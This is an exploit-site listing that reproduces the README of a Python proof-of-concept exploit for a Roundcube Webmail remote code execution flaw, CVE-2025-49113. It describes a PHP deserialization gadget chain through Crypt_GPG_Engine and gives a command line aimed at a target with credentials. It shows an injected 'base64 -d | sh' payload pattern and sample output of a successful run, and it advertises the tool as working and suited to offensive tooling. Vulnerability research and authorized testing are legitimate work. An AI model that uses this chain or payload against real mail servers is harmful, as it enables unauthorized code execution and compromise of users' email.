Exploit for CVE-2025-49113

Name: Exploit for CVE-2025-49113
Rating: 5 (601 reviews)
2025-07-19 | CVSS 9.9
## https://sploitus.com/exploit?id=B86DD116-6D0F-516E-9915-1248AAC19FB8
# CVE-2025-49113 – Roundcube Webmail RCE Exploit (Python PoC)

> **CVE ID:** CVE-2025-49113  
> **Exploit Type:** Remote Code Execution (via PHP Object Injection)  
> **Application:** Roundcube Webmail ≤ 1.5.9 and ≤ 1.6.10  
> **Exploit Language:** Python  
> **Author:** 00xCanelo  
> **Status:** Tested and Working on Vulnerable Roundcube Installations

---

## 📌 Description

This exploit leverages a vulnerability in how Roundcube Webmail handles uploaded image filenames which are unserialized as PHP objects. By crafting a malicious payload that triggers a `Crypt_GPG_Engine` deserialization chain, remote command execution can be achieved **post-authentication**.

This Python PoC mimics the attack chain used by the public PHP exploit, but with cleaner logic, optional logging, and ease of usage in offensive tooling setups.

---

## 🚧 Prerequisites

- Vulnerable Roundcube version (≤1.5.9 or ≤1.6.10)
- Valid user credentials on Roundcube
- Python 3.x environment
- `pip install requests`

---

## 🚀 Exploitation Steps

```bash
python3 CVE-2025-49113.py    
```

### Example:

```bash
python3 CVE-2025-49113.py https://mail.target.htb/ user@target.htb 'P@ssw0rd123' 'id'
```

---

## 🔐 Vulnerable Chain

The PHP class `Crypt_GPG_Engine` allows setting a `_gpgconf` field, which is then passed to shell execution.

Our payload crafts:

```php
echo "" | base64 -d | sh
```

in `_gpgconf`, which leads to RCE upon deserialization.

---

## 💣 Sample Output

```bash
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
```

---

## 📁 File Structure

```
.
├── CVE-2025-49113.py     # Python PoC script
└── README.md             # This documentation
```

---

## ⚠️ Disclaimer

This code is for **educational and authorized security testing** purposes only. Any misuse of this tool is strictly prohibited. The author is not responsible for any damages caused.

---

## 🧠 References

- https://nvd.nist.gov/vuln/detail/CVE-2025-49113
- https://github.com/roundcube/roundcubemail/issues/9312
- https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/